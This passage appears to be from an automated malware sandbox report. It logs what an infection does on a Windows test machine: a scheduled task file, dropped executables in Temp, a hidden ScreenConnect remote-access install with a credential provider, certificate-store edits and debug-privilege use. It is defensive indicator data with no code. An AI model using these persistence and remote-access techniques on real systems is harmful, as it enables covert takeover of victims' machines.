File created C:\Windows\Installer\f77f1bf.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job N/A N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\43a951fb75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
